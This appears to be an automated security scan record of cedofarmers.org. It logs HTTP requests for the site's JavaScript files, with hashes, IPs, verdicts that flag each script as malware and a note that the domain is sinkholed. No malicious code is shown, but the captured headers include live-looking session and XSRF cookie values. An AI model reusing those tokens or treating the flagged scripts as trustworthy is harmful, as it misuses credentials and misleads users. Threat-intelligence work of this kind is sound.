laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 6766
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/owl.carousel.min.js
192.185.57.117200 OK 16 kB URL HTTP/2 cedofarmers.org/js/owl.carousel.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (32035)
Hash ba718faf7d0b70331002a08b21cb59a9
e95351f57800bcccb528cba3f019b0ed71b7dd95
d4c7012b6c81af915538208c9ebab6a2d99ef16b57d411b74e3191b5ba8db169
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/owl.carousel.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 15509
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.easing.1.3.js
192.185.57.117200 OK 2.8 kB URL HTTP/2 cedofarmers.org/js/jquery.easing.1.3.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash d393d9f57ac1e235965f6a8115bc497f
28b5b3eb6dafc4bf8f3f27e209bdb62931470de2
02bf96fb3412a080cc6f155e8952e10d3f1d204a581e1aa08d4d3c095096a27e
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.easing.1.3.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2789
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.animateNumber.min.js
192.185.57.117200 OK 747 B URL HTTP/2 cedofarmers.org/js/jquery.animateNumber.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (527)
Hash 40bca4537ed2129cb598f9ffbf29141c
68ad9269449269e54fd761b91d58a0e947ea21f7
6749cb11f6ec74583b49f9b5ff2f75929d78c22af7184a008796ba377dc7fb8b
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.animateNumber.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 747
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
use.fontawesome.com/releases/v5.7.2/webfonts/fa-solid-900.woff2
172.64.132.15200 OK 74 kB URL HTTP/2 use.fontawesome.com/releases/v5.7.2/webfonts/fa-solid-900.woff2
IP 172.64.132.15:0
File type Web Open Font Format (Version 2), TrueType, length 74348, version 329.31064\012- data
Hash 462806316fea535a6a57651bc2b000b0
80644191098f863f25be27841c0d92c452cf2327
4f9ee3d8f6e621642979e6a8f7e75c57cb9da34918cc08a38abfe178dbae1dd2
GET /releases/v5.7.2/webfonts/fa-solid-900.woff2 HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://cedofarmers.org
Connection: keep-alive
Referer: https://use.fontawesome.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 08 Nov 2022 22:20:37 GMT
content-type: font/woff2
content-length: 74348
x-amz-id-2: iJgmlNxQi/sKXR3wPLd0PCN+rnt3KjjmZAU6Rzj56CldD3vsptyy4CPSi/OjSMIuasxBvW21qPI=
x-amz-request-id: B5ZNH65HPX6SY9EY
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:46:18 GMT
etag: "462806316fea535a6a57651bc2b000b0"
cache-control: max-age=31556926
cf-cache-status: MISS
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFLkF7XvgM4j%2BRditTT%2F6vQFxcP9k9yeDdBj6uV85OaGTcrhyJI0cT60qImBkCL4Doo9UmSTPdxC5AONi4jZ0EXVDLHqNqrkD386VPu6C3ZjwK98eTSL4ARtmHm09CZfs8%2FTqedw"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7671b26dcf3275c6-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.timepicker.min.js
192.185.57.117200 OK 6.3 kB URL HTTP/2 cedofarmers.org/js/jquery.timepicker.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (15516)
Hash 08067ede5d206b26fccbb23d95361eb2
c64f0b991ed0460e73f4d84ef656960b3686f15e
3bf889f378d89317e9f7eeca4a4c9eab04c50a9c684e3bc6920bf5aa6db96d69
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.timepicker.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 6300
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/scrollax.min.js
192.185.57.117200 OK 3.5 kB URL HTTP/2 cedofarmers.org/js/scrollax.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (567)
Hash 86a4f5314ead33144666591358283dbf
e96f5ee479f0acd04dc7f05e81bd1b17dd045a78
d214654b8c08d790c05d134b7d00ddee5616b96400c5ab79ef21bbc95312156a
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/scrollax.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3479
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/bootstrap-datepicker.js
192.185.57.117200 OK 15 kB URL HTTP/2 cedofarmers.org/js/bootstrap-datepicker.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 2b79093933df55bc5c7ef67c538716d6
dcd4c757ffb7e12e2fdcb79bfb63a89904ddcdb0
63c105faabd1a5e17ae5f3c9d38d2496e244b2f9eb212089a0370bc737006494
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/bootstrap-datepicker.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 15126
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 4599ea4ab89bca0461dfc4e86cf90610
d513a3fca97e06dbc1a6cdd02fbdd3c7253c865a
6056ef181a66539dd449318a89c133c3711e3244394126a66b8ebd29cff4692b
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "6056EF181A66539DD449318A89C133C3711E3244394126A66B8EBD29CFF4692B"
Last-Modified: Tue, 08 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9386
Expires: Wed, 09 Nov 2022 00:57:03 GMT
Date: Tue, 08 Nov 2022 22:20:37 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 4599ea4ab89bca0461dfc4e86cf90610
d513a3fca97e06dbc1a6cdd02fbdd3c7253c865a
6056ef181a66539dd449318a89c133c3711e3244394126a66b8ebd29cff4692b
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "6056EF181A66539DD449318A89C133C3711E3244394126A66B8EBD29CFF4692B"
Last-Modified: Tue, 08 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9386
Expires: Wed, 09 Nov 2022 00:57:03 GMT
Date: Tue, 08 Nov 2022 22:20:37 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc6fadd94-b1a4-4bdc-bcf4-b6bade4840a0.jpeg
34.120.237.76200 OK 10 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc6fadd94-b1a4-4bdc-bcf4-b6bade4840a0.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 4e2853cc6ec6223160471401e6871f4b
f052e1f8b2bf4a8eeecfa5b82e27ada1b7719a0c
bf4b9145ea043d87a30fd3aeeae21a1a0aa27004cd2467e7aa843bc894ae1f60
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc6fadd94-b1a4-4bdc-bcf4-b6bade4840a0.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 10462
x-amzn-requestid: 6dc7dc5c-88e9-4550-abf0-f16965ab7cd3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bF_38GKXoAMFwSA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636579cc-28ea4125437c31cc34683fb7;Sampled=0
x-amzn-remapped-date: Fri, 04 Nov 2022 20:45:00 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: Q0yZmbExDP4tH0n1n2qj_NR2Mv_y_dsO0LJ1RKZoS6Me-NLbhpUWqw==
via: 1.1 470e3fe246a660ba6ace67a79f78d246.cloudfront.net (CloudFront), 1.1 ee8246c5442dace7525c74f6a799bb46.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 09:08:56 GMT
age: 47501
etag: "f052e1f8b2bf4a8eeecfa5b82e27ada1b7719a0c"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1b197dc2-1415-4c19-8d36-1fa334168ba5.jpeg
34.120.237.76200 OK 9.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1b197dc2-1415-4c19-8d36-1fa334168ba5.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 29429581f8dc762c69c5916009f70080
9265cae98aa663a5498925b70079abdd8e7031fd
c3deee74c80905a1e92b84868b9987cb30ad7a210dca066b97c325cc2c83872e
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1b197dc2-1415-4c19-8d36-1fa334168ba5.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9313
x-amzn-requestid: be3f6b0f-cf61-4bec-ad1a-87abdbc45d73
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTTwF5AoAMFZAw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc17-5ca45b5b1065a4ea492f2ac6;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:37:27 GMT
x-amz-cf-pop: SEA19-C3, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 9lVY7YgQQ0FAP3ItgCSWePY0Msd4RIyBz4eNPc-K51BtnWUjOObv6g==
via: 1.1 31dfa94142c6eaf975b0e5454c00340a.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:43 GMT
etag: "9265cae98aa663a5498925b70079abdd8e7031fd"
content-type: image/jpeg
age: 2214
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f9389c7-c025-4f6b-b922-12f7edbee6c5.png
34.120.237.76200 OK 9.8 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f9389c7-c025-4f6b-b922-12f7edbee6c5.png
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash b2690c9cc30d7974ed39c4d680d9cb93
132e96b7579376ccf4c868f33c8229ab534b45ea
c17b9b14a7347b0d4cd6ea2b5a44e47abc6e6cdba5c3ed082342da752eb6f8f0
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f9389c7-c025-4f6b-b922-12f7edbee6c5.png HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9792
x-amzn-requestid: 901422d7-08e6-46ac-a8a2-efd52057cde8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: atDvMGq2oAMFq_g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-635b7ffa-17055cbc5c8a0172775650a6;Sampled=0
x-amzn-remapped-date: Fri, 28 Oct 2022 07:08:42 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: gpFfSzKikjfuVfVxOVQDu8znJIQZPsokevZWivGPlsSKst68YF5tLQ==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 cd858042f70b416ca05e042acf3908a4.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:57 GMT
age: 2200
etag: "132e96b7579376ccf4c868f33c8229ab534b45ea"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6ec06e64-918f-480d-ac05-7fea783ee61f.jpeg
34.120.237.76200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6ec06e64-918f-480d-ac05-7fea783ee61f.jpeg
